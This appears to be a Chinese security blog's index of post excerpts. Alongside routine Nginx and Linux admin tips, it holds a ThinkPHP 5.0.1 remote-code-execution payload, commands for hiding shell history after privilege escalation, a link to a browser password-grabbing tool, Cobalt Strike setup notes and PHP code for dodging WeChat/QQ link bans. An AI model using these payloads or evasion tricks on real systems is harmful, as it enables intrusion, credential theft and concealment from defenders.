内网抓取密码

2021年12月20日  No comment

内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »

Linux提权后总结

2021年08月10日  No comment

发行类型 版本在命令前加空格 命令不会被记录 [空格]set +o history   设置命令不被记录 set -o history       恢复记录命令 history -d [num]      删除指定命令行 num指左边序号标示 echo
阅读全文 »

Nginx设置开机自启

2021年06月19日  No comment

  以centos为例  进入/etc/init.d/目录,新添加nginx文件#!/bin/sh # # nginx - this script starts and stops the nginx daemon # # chkconfig:   - 85 15 # description: &n
阅读全文 »

thinkphp 5.0.1的坑

2021年04月18日  No comment

判断是否存在http://xxx.com/publics=phpinfo()&_method=__construct&filter=assert _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_func&
阅读全文 »

Linux服务器使用speedtest-cli测速

2020年11月30日  No comment

需要在python环境下使用pip install speedtest-clispeedtest-clispeedtest-cli --list | grep Chinaspeedtest-cli --server 4870
阅读全文 »

Linux同步时间

2020年11月29日  No comment

 由于NTP服务同步时间存在秒的误差采用 tzselect 来精准设置cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtimeordate -s 20/11/29 date -s 23:35:09
阅读全文 »

Nginx反向代理镜像网站

2020年11月14日  No comment

  链接:https://pan.baidu.com/s/1NmFd4EAgpR6D0xj3vcKE3g 密码:a834 tar -zxvf nginx-1.7.5.tar.gz  tar -zxvf pcre-8.37.tar.gz   tar -zxvf openssl-1.0.2a.tar.gz   tar -zxvf&nbs
阅读全文 »

获取阿里云机器的外网IP

2020年11月14日  No comment

        用于获取 ipconfig 不显示外网IP的机器nslookup myip.opendns.com. resolver1.opendns.com      wget http://members.3322.org/dyndns/getip  curl ip.sb curl ip.cn
阅读全文 »

php实现微信qq防封

2020年05月05日  No comment

<?php function is_weixin_visit() {     if (strpos($_SERVER['HTTP_USER_AGENT'], 'MicroMessenger') !== false) {         return true;
阅读全文 »

安装cobalt strike踩坑记录

2019年11月07日  No comment

安装cobalt strike踩坑记录yum -y installed|grep java                 //检查已安装java版本 yum -y remove java*    //卸载已安装的java&nbs
阅读全文 »